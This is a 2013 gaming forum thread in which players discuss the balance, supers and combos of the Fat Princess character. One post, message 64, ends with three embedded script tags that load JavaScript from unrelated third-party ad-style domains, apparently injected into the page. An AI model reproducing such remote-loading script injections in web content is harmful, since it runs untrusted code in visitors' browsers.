Lombax Warrior
142 posts

Re: Fatty P 50 Kill Confirms under 5 minutes!

Feb 7, 2013
...... I don know man the thing is she has no mobility and recovery time from her atacks sucks, if somebody blocks my jump square i get comboed even with her atack range im just saying minions is all she has take that away from her and she is useless. And the idea you gave will messup ALL her combos cause you have to imput an atack right after a minion to conect those 5 frames will be her death lol im just saying if that happens i will just move to another character like ecole and grab super you or super mega armor punch you and super......
Message 61 of 65 (62 Views)
0 Likes
Highlighted
Lombax Warrior
160 posts

Feb 7, 2013

FP's weakness with herself is her super buildup. The higher her super meter, the worse her super is. Her Level 2 is good, but her Level 1 is quicker and "safer". I have more of a chance to stop a Level 2 super with her Level 1 than her Level 2. Plus the cost of it is cheaper. Fat P is one of the few characters in the game that you really don't WANT to build up to her Level 3: it's atrocious and probably the 2nd worst Level 3 only to Sir Dan (poor guy rest his undead soul). So yes she can combo like crazy, but she has to limit herself.

Honestly I think FP needs SOME of these HCs in her Level 1, because sure it's quick and has decent range: but it's easily stopped and fails on edges/curves. I wrote a post invoving her supers and the pros/cons: This is a link to that thread

Also the vid is more of 5(?) hit confirms and possible extended combos into them. They're REALLY good combos and possible stun situations, but a TAD misleading =P but veryvery nice overall~

~GL

#PrincessPowerhouse
#PrincessPowerhouse
Message 62 of 65 (59 Views)
0 Likes
Hekseville Citizen
282 posts

Feb 7, 2013

I would say that her 2 is very underrated. I've gotten 4 kills with it in 2v2, and on many occassions 2 kills in 1v1. Being able to combo into it many different ways also makes it much more effective. Both Fatty's 1 and 2 are super dangerous supers. If I get my 2 on her im not disappointed.

Check out my channel for Combo Videos and Tournament matches!
www.youtube.com/mogilsumi
Message 63 of 65 (53 Views)
Gaming Beast
2167 posts

Feb 7, 2013

Chof_23 wrote:
...... I don know man the thing is she has no mobility and recovery time from her atacks sucks, if somebody blocks my jump square i get comboed even with her atack range im just saying minions is all she has take that away from her and she is useless. And the idea you gave will messup ALL her combos cause you have to imput an atack right after a minion to conect those 5 frames will be her death lol im just saying if that happens i will just move to another character like ecole and grab super you or super mega armor punch you and super......
Five frames is the same thing that every character gets from an aerial, so you know, the same thing as say, SH square or down square for example has 5 frames of ending lag as well, and that's not huge. It's not enough to interfere with combos, but it is enough to punish minion>airdodge into the ground.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 64 of 65 (48 Views)
0 Likes
Uncharted Territory
1512 posts

Feb 7, 2013
Fromundaman is right. That needs to happen.
Photobucket Pictures, Images and Photos
Message 65 of 65 (44 Views)
0 Likes